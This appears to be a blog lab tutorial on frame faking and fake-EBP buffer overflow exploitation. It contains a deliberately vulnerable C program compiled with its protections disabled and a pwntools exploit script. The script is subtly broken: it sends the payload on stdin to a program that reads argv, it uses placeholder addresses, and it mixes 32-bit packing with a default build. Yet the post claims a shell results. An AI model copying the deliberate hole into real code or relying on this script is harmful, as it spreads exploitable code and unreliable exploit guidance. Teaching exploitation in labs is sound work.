strangerRidingCaml

Frame Faking and Fake EBP Lab 본문

System hacking

Frame Faking and Fake EBP Lab

woddlwoddl 2024. 5. 7. 17:24
728x90
Frame Faking and Fake EBP Lab

Frame Faking and Fake EBP Lab

In this lab, we will learn how to manipulate stack frames and EBP for privilege escalation.

Lab Activities:

1. Creating Vulnerable C Program:

First, let's create a vulnerable C program with a buffer overflow vulnerability.


  #include <stdio.h>
  #include <string.h>

  void vulnerable_function(char *input) {
      char buffer[64];
      strcpy(buffer, input);
  }

  int main(int argc, char *argv[]) {
      if (argc != 2) {
          printf("Usage: %s <input>\n", argv[0]);
          return 1;
      }

      vulnerable_function(argv[1]);

      printf("Program executed successfully.\n");
      return 0;
  }

Save the above code to a file named vulnerable.c and compile it with the following command:

$ gcc -o vulnerable -fno-stack-protector -z execstack vulnerable.c

2. Writing Exploit Script:

Now, let's write an exploit script in Python using pwntools to manipulate the stack frames and EBP.


  from pwn import *

  # Specify the path to the vulnerable binary
  binary_path = './vulnerable'

  # Address of function to return to
  return_address = 0xdeadbeef  # Example address (change as needed)

  # Offset to return address
  offset = 72

  # Fake EBP value
  fake_ebp = 0xdeadbeef  # Example value (change as needed)

  # Craft the payload
  payload = b'A' * offset
  payload += p32(fake_ebp)  # Fake EBP
  payload += p32(return_address)  # Return address

  # Launch the exploit
  p = process(binary_path)
  p.sendline(payload)
  p.interactive()

Explanation of the Python script:

  • We specify the address of the function to return to and the fake EBP value.
  • The payload consists of padding, followed by the fake EBP value and the return address.
  • We launch the vulnerable binary and send the payload to trigger the frame faking and fake EBP exploit.
  • p.interactive() allows us to interact with the spawned shell.

3. Exploiting the Vulnerability:

Execute the Python script to exploit the buffer overflow vulnerability:

$ python exploit.py

Once executed, you should have a shell prompt, confirming the successful exploitation of the frame faking and fake EBP vulnerability.

'System hacking' 카테고리의 다른 글

Return-Oriented Programming (ROP) Lab  (0) 2024.05.07
Frame Pointer Overwrite Attacks Lab  (0) 2024.05.07
Return-to-Libc (RTL) Exploits Lab  (0) 2024.05.07
Return-to-Shellcode Attacks Lab  (0) 2024.05.07
Shellcode Development Lab  (0) 2024.05.07
'System hacking' Related Articles more